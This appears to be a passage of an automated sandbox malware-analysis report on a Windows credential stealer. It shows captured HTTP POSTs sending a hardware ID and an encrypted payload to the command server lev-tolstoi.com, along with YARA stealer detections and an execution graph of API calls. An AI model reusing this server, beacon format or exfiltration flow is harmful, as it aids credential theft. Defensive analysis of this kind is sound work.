                                                                                                                                                                                                                                                      2024-12-26 11:54:24 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=Y6D6EX0ZTZ3UD39FU1K
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 1226
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:24 UTC1226OUTData Raw: 2d 2d 59 36 44 36 45 58 30 5a 54 5a 33 55 44 33 39 46 55 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 41 34 33 31 31 33 32 38 44 35 31 30 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 36 44 36 45 58 30 5a 54 5a 33 55 44 33 39 46 55 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 36 44 36 45 58 30 5a 54 5a 33 55 44 33 39 46 55 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                      Data Ascii: --Y6D6EX0ZTZ3UD39FU1KContent-Disposition: form-data; name="hwid"17A4311328D510E6BEBA0C6A975F1733--Y6D6EX0ZTZ3UD39FU1KContent-Disposition: form-data; name="pid"1--Y6D6EX0ZTZ3UD39FU1KContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                      2024-12-26 11:54:25 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=dk854jklj8es1m3en0v2ro8pjf; expires=Mon, 21 Apr 2025 05:41:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHIGtAOD5wstXzUAFLgZjigExfM3xHpYsYHPGoXUXa1Ak9lWuOjZ7JZdZcPQQ8tS6afg7ESJ4SnwNRJS18jsGdQvaEGZ7i56yg1r6%2BuOVOnm6PSK%2FW7eD3I3xK68EFoEF2o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e03feae680cd-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1467&rtt_var=566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2143&delivery_rate=1908496&cwnd=178&unsent_bytes=0&cid=58aa55b1eb8c7e1e&ts=765&x=0"
                                                                                                                                                                                                                                                      2024-12-26 11:54:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                      2024-12-26 11:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      7192.168.2.949768172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=4K5AXWGSDPDJ4LF
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 585194
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: 2d 2d 34 4b 35 41 58 57 47 53 44 50 44 4a 34 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 41 34 33 31 31 33 32 38 44 35 31 30 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 34 4b 35 41 58 57 47 53 44 50 44 4a 34 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 4b 35 41 58 57 47 53 44 50 44 4a 34 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 4b 35 41 58
                                                                                                                                                                                                                                                      Data Ascii: --4K5AXWGSDPDJ4LFContent-Disposition: form-data; name="hwid"17A4311328D510E6BEBA0C6A975F1733--4K5AXWGSDPDJ4LFContent-Disposition: form-data; name="pid"1--4K5AXWGSDPDJ4LFContent-Disposition: form-data; name="lid"PsFKDg--pablo--4K5AX
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: 32 9e ff 67 0c 4a 5e fb 3c ba d1 43 f3 f2 d5 69 9d 17 0f 11 af d9 d1 b5 b2 12 2a 49 cd 5e 58 f3 e3 13 6b 49 b0 aa 05 55 13 71 94 9e c3 8a 5b bb 11 3f 16 98 54 ce 1d 67 9e 02 97 45 8d f7 a7 1f 01 97 5d 60 a1 f1 2e fd 3c 52 2e 49 73 6f f1 6f a6 89 c8 ce 1b ad ba a6 7a 68 bd 43 d3 0a c5 75 c4 8f 53 0c 05 b8 45 92 55 b0 8c d4 8d d1 0c d5 ef fd d6 89 39 3a 27 fa a3 d0 3b 32 e1 aa 6a af ed 24 56 60 be 2e 35 1e d4 ab 74 9f 01 81 73 2d 63 15 08 f0 74 41 ce 74 ea 78 f5 c5 a0 de f6 84 1f 63 e5 db 3c 70 c0 aa 8f e1 b9 67 a9 4e 99 49 2e 65 cd f6 37 55 3d fe 23 28 3a f6 26 ce 0a 43 a3 34 50 fd 09 65 36 c0 19 47 3d 98 9e 4a 20 f5 04 1e 90 fd 4c 5c d7 52 e1 9a 1d fd de aa 8b 45 d3 23 a1 ad ab 1d 3d 0c 57 38 62 47 db ad 22 f7 f5 24 30 d7 d9 f1 bf 8b 3e 8f 89 05 b6 cd 9c
                                                                                                                                                                                                                                                      Data Ascii: 2gJ^<Ci*I^XkIUq[?TgE]`.<R.IsoozhCuSEU9:';2j$V`.5ts-ctAtxc<pgNI.e7U=#(:&C4Pe6G=J L\RE#=W8bG"$0>
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: 54 28 c3 ba 84 ee cb c4 21 37 31 80 31 ec 46 01 c4 ef af 13 d9 be 02 8d 29 5e ae a7 c8 68 85 52 0b 10 bb 48 3a 09 2c 77 fc 39 54 fa d8 f6 c6 08 19 7c 09 02 f8 10 41 62 3e c5 1f df b8 a5 c6 18 9b 78 8d ac 05 0d 99 3f 82 1b 00 d5 5c c9 8e 4d 1c 83 64 e1 4c ec 2d af f5 f7 7b 28 f1 c0 e9 d7 3e 04 7a 5c cf 17 34 6e 61 6e 6c 7a be 00 3c 0e 91 08 fd a1 7e 3c 5d cc d1 6e 6b 56 46 b9 00 7f 8f 29 36 5a 34 7d e0 88 c9 7f a9 21 e7 46 6b 43 e3 01 89 86 fd 11 3c e4 6b da 8e 64 8f a4 92 29 c2 5e 04 93 9d 37 0b c7 a1 ec 56 8a 90 45 78 e4 16 08 e9 f3 01 9d 23 7f 3e 69 aa bc 54 f0 ae 34 d2 ce 0e 22 b1 64 c0 d5 16 03 cc f8 f9 7b e6 c2 09 91 6e 1b fe cc 5f ec c7 e3 f0 ae 2f 4d cb 83 0e f7 b1 23 95 71 f8 26 e1 52 5b 1f f0 f0 e1 df 3f 2f 92 14 72 76 a7 cc db cb 42 67 63 88 94
                                                                                                                                                                                                                                                      Data Ascii: T(!711F)^hRH:,w9T|Ab>x?\MdL-{(>z\4nanlz<~<]nkVF)6Z4}!FkC<kd)^7VEx#>iT4"d{n_/M#q&R[?/rvBgc
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: f3 bc 17 e7 cf 96 ef 8a bf 63 d3 79 be 0e 86 79 ec dc 95 cc 65 61 ae 41 22 ea 85 34 a6 10 b8 a3 e4 8d bf f3 44 27 ef 67 c8 ff 94 41 26 58 c9 75 88 76 5d 19 41 ff d7 f9 40 5f 14 75 1f e2 b7 71 70 7a 0b ff 8c 04 a8 cf 1a 42 c0 5c e2 48 d5 fb 83 f0 0f 40 51 6f e9 53 dd f0 aa 76 3d 2e da 29 19 a4 0a e4 f5 e9 c3 f2 e0 5c 5b 97 10 78 58 ca 13 60 6a b7 79 bc b2 6d 8b 36 8b 78 ed 8c 23 62 89 f8 af 59 ae 42 f8 b7 16 05 c4 b8 eb fb 2d 0a f2 24 b6 9f 94 30 07 d2 71 71 32 63 b5 e5 b4 33 20 ab 8c 83 07 92 2b c3 39 7b cd de 22 19 bb 4e fa 26 02 fe 91 cf b8 b8 f5 fb 00 7c 76 cc 1e 0b ac e8 0d d3 4f 2c fc 4e 88 2c e3 d7 cf 5f 24 a6 89 e6 cc 56 63 a8 b1 d1 89 c8 7b 57 d5 b3 dc eb f4 f8 80 a4 d0 16 d9 73 67 b3 1a 19 d2 9a 8a 55 9b cf 65 bd 25 fc 75 89 0a 30 24 f2 bd c9 14
                                                                                                                                                                                                                                                      Data Ascii: cyyeaA"4D'gA&Xuv]A@_uqpzB\H@QoSv=.)\[xX`jym6x#bYB-$0qq2c3 +9{"N&|vO,N,_$Vc{WsgUe%u0$
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: f3 9f c3 68 b9 61 6d f2 42 eb e1 30 7e a1 1e 45 a1 9f 1a 09 61 c5 27 10 ad 11 86 81 8b be 1a 09 ea 2c 43 94 45 e6 3b 01 c2 17 ec 2d 75 fe 6f e2 47 ad f4 8d 08 01 e8 67 1f 8c 44 0c 3f b8 39 dc 39 f8 e9 6c 89 cf 61 7a f4 a7 83 17 cc 76 b7 73 bd 1c e1 df 0a 39 2d b4 49 14 f8 01 06 03 71 70 31 e6 e5 db d7 47 cc 1a ff 6f 23 f3 9d 35 62 21 de f7 31 04 2c 08 6d f5 e1 cb f4 21 c4 c1 e0 c0 92 fc 92 48 d5 9d 8c 6b 6f 7f b1 fa 34 40 ec 15 86 e9 8c 3b 6d 70 33 d8 4c 77 c4 91 0f 20 dc 2e 45 97 f7 51 08 63 f9 10 76 a8 56 b6 3a eb e7 e9 1c 1b b8 28 86 ba d2 ff e8 10 51 99 a1 d4 85 5f bb 7d c4 4c 9d d8 b1 59 de 20 85 c4 56 89 c0 e2 d9 92 48 19 37 44 78 c1 43 12 15 1f c8 76 d3 cd aa 87 2d fe 2e 0b c2 c2 e5 3b 59 ee 7b 0a 9c 45 ab 8d 90 ec 75 a3 bf e8 f2 fa ab 82 9b d7 08
                                                                                                                                                                                                                                                      Data Ascii: hamB0~Ea',CE;-uoGgD?99lazvs9-Iqp1Go#5b!1,m!Hko4@;mp3Lw .EQcvV:(Q_}LY VH7DxCv-.;Y{Eu
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: ff 5d 68 6a ba 30 ff 50 57 73 20 3a 85 3f e1 86 f9 76 cf 38 95 6d 01 5b 74 11 21 25 98 f8 da a3 73 ce 02 97 a6 4e fa f7 b9 b8 fb c2 07 e1 53 c2 64 59 ec 2d 4d be d8 65 a2 10 da 0c bb 5d 5a f6 da c3 bc 04 11 9c 1b 56 80 fe a2 8c b5 e2 d4 78 bb e1 b0 4b ac 6f 4a d7 c4 cb aa 05 76 60 5f 13 59 fa 2e 1d 1b df 62 0d e2 83 f5 e3 a8 d9 d6 a5 f1 4e 1e 19 f1 d2 71 25 7a d1 c4 aa 3e 33 72 f3 e6 e6 8f ae 7c 5f be 0a f3 84 11 88 f7 e0 4d 24 01 38 37 16 90 0a fa a5 a2 01 ea 17 f6 c9 17 78 ab 0c 63 de 02 79 18 6c c8 3f c0 c0 80 5d 97 49 a2 a0 4a 13 89 00 ff 87 69 0f 40 5d fd 7b bc a0 74 c6 ce c1 39 54 fd e6 58 c7 c7 97 b6 af 6c 9d 42 b4 6f ea 75 ce e4 56 8b 73 17 6f c9 bf dd 06 14 e6 7d c6 2e 56 9d 99 8e 89 19 6d a9 a5 9f 2f 26 ae cc 53 02 05 0e 4b 67 8a fe 45 a7 d8 ee
                                                                                                                                                                                                                                                      Data Ascii: ]hj0PWs :?v8m[t!%sNSdY-Me]ZVxKoJv`_Y.bNq%z>3r|_M$87xcyl?]IJi@]{t9TXlBouVso}.Vm/&SKgE
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: 21 cf 83 e6 7a c7 d6 b8 c9 d5 eb cf 33 ea aa 3f f0 d7 ab ef 5c 1b 2a d9 87 06 19 f5 73 a1 c2 67 85 80 4f 5f df c3 da f9 6a 59 50 75 a3 d2 61 1f 1a 36 30 40 5a 53 3d bf 36 5f 93 97 4c ff da 67 88 4f 71 42 1a de 85 a8 67 f3 e0 a4 40 bb e3 fa dc 55 08 ac cf 22 15 09 e9 9a 72 a9 85 20 69 2f 0a ae e3 7e 94 5b 66 de e8 f0 f9 f1 be 88 64 21 cc dc 75 7d 62 6a f5 a5 ec a2 fa 20 51 fb b1 42 fc b3 e3 ae 93 c5 b3 95 87 13 1a ae d5 33 e5 97 aa 3e 1d 0d bd f0 a0 b1 fb e3 82 ae f6 84 4f cb 97 08 0b d1 cd 31 6d d2 e0 30 6d f1 ad 8d 2a e9 d0 7b 65 5e 5f e4 4d 01 78 88 a6 fd f3 bf 13 42 1b 77 22 8b ed 21 0a a8 63 9a fc 79 52 7a e0 2e 85 ba 87 e7 f0 06 5b 82 47 ba 19 d5 7c 04 5c 52 d3 c5 00 2f 43 c4 23 27 21 62 08 2c ff 4d 79 0f aa 93 d0 ad e6 11 46 8b c7 21 d2 6f 85 5b a8
                                                                                                                                                                                                                                                      Data Ascii: !z3?\*sgO_jYPua60@ZS=6_LgOqBg@U"r i/~[fd!u}bj QB3>O1m0m*{e^_MxBw"!cyRz.[G|\R/C#'!b,MyF!o[
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: a9 fe 75 83 89 78 10 a3 25 de c2 63 5e b8 7b cc 67 0f 7e 69 f3 e6 41 3e e3 ae 10 97 b9 f5 59 92 68 2b e1 2b 09 89 e6 e7 ea d8 95 96 7b d0 14 b1 07 b5 2f e6 9e 59 9f b4 f6 dd 1a 81 0a ab e5 06 eb 83 1e ad d8 d0 7f 16 b0 01 a3 cc 91 f4 be 14 0f 96 ff 4d e3 b4 f2 36 0b 07 88 44 7b 3b df f3 2c 3a c5 9a d3 6b 5e de 8f be 91 3f c0 77 e7 95 d2 8c c2 d4 79 13 83 e3 3d 5b 8d 67 5d de a6 a9 b8 43 a4 71 a1 ed 9d dc ee ff 8d 84 e0 92 c2 76 6c 6b ae ad 36 8c f0 ac 36 80 4e 14 73 d4 06 5a a8 a2 4e 18 df 71 8a ad 17 53 eb 59 ec 76 9c d3 93 96 f3 ab 27 a0 6f 2b 6e 00 8e 8b 3f 00 94 30 4f 26 14 61 14 f0 23 6a f1 15 f6 28 70 63 39 c6 11 ac 57 5f c3 75 87 ad f7 fe 12 46 d6 eb ca 4e e2 30 93 da 32 77 37 57 2c 5d 0c b5 67 2c ed df f3 2e 8a f4 85 3a f6 e3 2e 41 fe c5 23 cc a7
                                                                                                                                                                                                                                                      Data Ascii: ux%c^{g~iA>Yh++{/YM6D{;,:k^?wy=[g]Cqvlk66NsZNqSYv'o+n?0O&a#j(pc9W_uFN02w7W,]g,.:.A#
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: 04 44 d5 62 15 38 1e 0f bb 58 26 47 4c 78 71 ac e1 b5 f3 b1 32 45 10 c7 07 53 87 94 f0 3d 25 60 0b 8b 48 6e 17 2d 2b c2 0b 1d 66 ad 08 bf 76 2d fa d7 d4 14 d4 72 14 f0 a1 e4 8c 92 77 34 34 ce 79 2d 5d 66 a4 6e 8f e4 76 a7 d2 a2 14 c5 66 95 fb c1 b8 ce 2f 61 25 29 8a 29 76 42 0b e2 bc ef e3 55 83 ef 94 32 3e 19 6a 05 5f ea 07 b4 3c 62 a1 89 8d 3f 02 7e c8 2a 74 5c c6 62 43 e2 85 f5 5a bd 5f cb b3 72 36 d6 8e c9 f1 aa 26 74 5c d8 67 31 ed 4f 89 13 dd 67 3c 38 42 50 86 ed 6b 7e 49 22 bd c9 c3 f2 ea 96 99 8f db 1e 02 22 83 ba 4d c4 64 e0 a1 80 fa 45 88 aa f7 c4 13 38 3c 59 b3 64 37 05 86 be 90 43 ac f3 83 c1 40 63 4f f6 83 dd aa 9d aa 22 a7 87 4d 4e a3 85 30 36 e1 95 db b7 fc c7 01 ac c1 63 89 30 25 44 44 34 ab e1 a0 6b 2b f6 ac 9c c5 cd e9 7e 72 05 46 ce ec
                                                                                                                                                                                                                                                      Data Ascii: Db8X&GLxq2ES=%`Hn-+fv-rw44y-]fnvf/a%))vBU2>j_<b?~*t\bCZ_r6&t\g1Og<8BPk~I""MdE8<Yd7C@cO"MN06c0%DD4k+~rF
                                                                                                                                                                                                                                                      2024-12-26 11:54:26 UTC15331OUTData Raw: c7 3f 7b 63 9b 5d a3 2b 91 f7 89 50 aa 10 85 a3 18 70 df 73 eb 0d 10 82 98 8f 89 76 85 45 5a a9 8c c0 60 2c 69 0a 2e 51 ea 79 08 b1 9e ec a1 30 cf e1 92 e2 a7 03 33 ba d9 d5 9c 5b 85 39 00 6f 97 d8 b6 18 ab 53 47 ce 1f 95 53 69 91 17 d1 c6 7f f5 02 a6 c6 e3 3a 50 66 a3 df 0c 97 dc 87 3a 96 43 e8 be b7 89 7e a0 9a ab 8a 8a ba ad 38 c6 77 0b 4c 23 33 a3 bc 6d 2a 0b 26 c3 e9 55 6d 6d 59 85 16 ed 98 14 0f 53 62 97 57 45 bf b4 32 31 7a ea 57 af f7 fe db c7 72 b2 cc 4c 9d c7 4d 5a b5 35 2e e3 0d 62 c7 ab 71 cd c9 77 49 2c 01 d9 66 81 0b ba 12 5e e6 fb bb 54 35 3a 53 6e c0 b7 e2 30 c8 f5 df 3a cf 39 92 bc 17 0d 11 e2 74 91 fb 2e 47 c7 31 2f 2f d4 3d 30 10 7c cb ad 38 36 a5 e5 4c 77 fa f0 82 70 5e 1d 11 38 fc fc 08 bc f5 ab f7 e9 82 f9 16 0f 33 7a 2b e0 a7 e2 f8
                                                                                                                                                                                                                                                      Data Ascii: ?{c]+PpsvEZ`,i.Qy03[9oSGSi:Pf:C~8wL#3m*&UmmYSbWE21zWrLMZ5.bqwI,f^T5:Sn0:9t.G1//=0|86Lwp^83z+
                                                                                                                                                                                                                                                      2024-12-26 11:54:29 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:29 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=3o8epr7eon4ta112vua2e926fq; expires=Mon, 21 Apr 2025 05:41:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUuyE66yIJJHt5EPdUQP0Ks9T0HS2WHAV%2BaG76eZBhbkUpkDWsQpQ6mR5RrXIRTcUn2eHRWnQkbNeZlYtQcTVxWalTYBcVJEE7JvxE%2BIXBbe4kqBy%2F3jFEUMwZL7s%2BIFwKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e04f8bda726b-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=2072&rtt_var=784&sent=372&recv=606&lost=0&retrans=0&sent_bytes=2834&recv_bytes=587781&delivery_rate=1409266&cwnd=238&unsent_bytes=0&cid=3ca366011439e398&ts=2514&x=0"


                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:06:54:03
                                                                                                                                                                                                                                                      Start date:26/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\4KDKJjRzm8.exe"
                                                                                                                                                                                                                                                      Imagebase:0x980000
                                                                                                                                                                                                                                                      File size:1'875'456 bytes
                                                                                                                                                                                                                                                      MD5 hash:6BE43AF1D47558E4993B9C341DA5A653
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539453644.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:70.9%
                                                                                                                                                                                                                                                        Total number of Nodes:247
                                                                                                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                                                                                                        execution_graph 8027 989d1e 8028 989d40 8027->8028 8028->8028 8029 989d94 LoadLibraryExW 8028->8029 8030 989da5 8029->8030 8030->8030 8031 989e74 LoadLibraryExW 8030->8031 8032 989e85 8031->8032 8217 9bc55c RtlAllocateHeap 8033 9d9497 VirtualAlloc 8218 98ef53 8219 98ef5d CoInitializeEx 8218->8219 8220 9ad34a 8221 9ad370 8220->8221 8221->8221 8222 9ad3ea GetPhysicallyInstalledSystemMemory 8221->8222 8223 9ad410 8222->8223 8223->8223 8034 9beb88 8035 9beba0 8034->8035 8037 9bebde 8035->8037 8041 9be110 LdrInitializeThunk 8035->8041 8039 9bec4e 8037->8039 8040 9be110 LdrInitializeThunk 8037->8040 8040->8039 8041->8037 8042 9be40d 8043 9be484 8042->8043 8045 9bed6e 8043->8045 8046 9be110 LdrInitializeThunk 8043->8046 8046->8045 8047 988600 8050 98860f 8047->8050 8048 988a48 ExitProcess 8050->8048 8051 9be080 8050->8051 8052 9bf970 8051->8052 8053 9be085 FreeLibrary 8052->8053 8053->8048 8054 9a1d00 8067 9c1320 8054->8067 8056 9a23f5 8058 9bc570 RtlFreeHeap 8060 9a239e 8058->8060 8059 9a1d43 8059->8056 8066 9a1de9 8059->8066 8071 9be110 LdrInitializeThunk 8059->8071 8060->8056 8077 9be110 LdrInitializeThunk 8060->8077 8062 9a2383 8062->8058 8063 9a245a 8062->8063 8066->8062 8072 9be110 LdrInitializeThunk 8066->8072 8073 9bc570 8066->8073 8069 9c1340 8067->8069 8068 9c145e 8068->8059 8069->8068 8078 9be110 LdrInitializeThunk 8069->8078 8071->8059 8072->8066 8074 9bc583 8073->8074 8075 9bc585 8073->8075 8074->8066 8076 9bc58a RtlFreeHeap 8075->8076 8076->8066 8077->8060 8078->8068 8224 98ce45 8225 98ce4b 8224->8225 8226 98ce55 CoUninitialize 8225->8226 8227 98ce80 8226->8227 8079 98e687 8080 98e6a0 8079->8080 8085 9b9280 8080->8085 8082 98e77a 8083 9b9280 5 API calls 8082->8083 8084 98e908 8083->8084 8084->8084 8086 9b92b0 8085->8086 8088 9b954f SysAllocString 8086->8088 8091 9b98eb 8086->8091 8087 9b9916 GetVolumeInformationW 8092 9b9934 8087->8092 8089 9b9574 8088->8089 8090 9b957c CoSetProxyBlanket 8089->8090 8089->8091 8090->8091 8094 9b959c 8090->8094 8091->8087 8092->8082 8093 9b98d6 SysFreeString SysFreeString 8093->8091 8094->8093 8095 9d95bd 8096 9da607 VirtualAlloc 8095->8096 8097 9da63e 8096->8097 8228 98cc7a 8229 98cc86 8228->8229 8242 9a42d0 8229->8242 8231 98cca8 8253 9a4560 8231->8253 8233 98ccc4 8264 9a7440 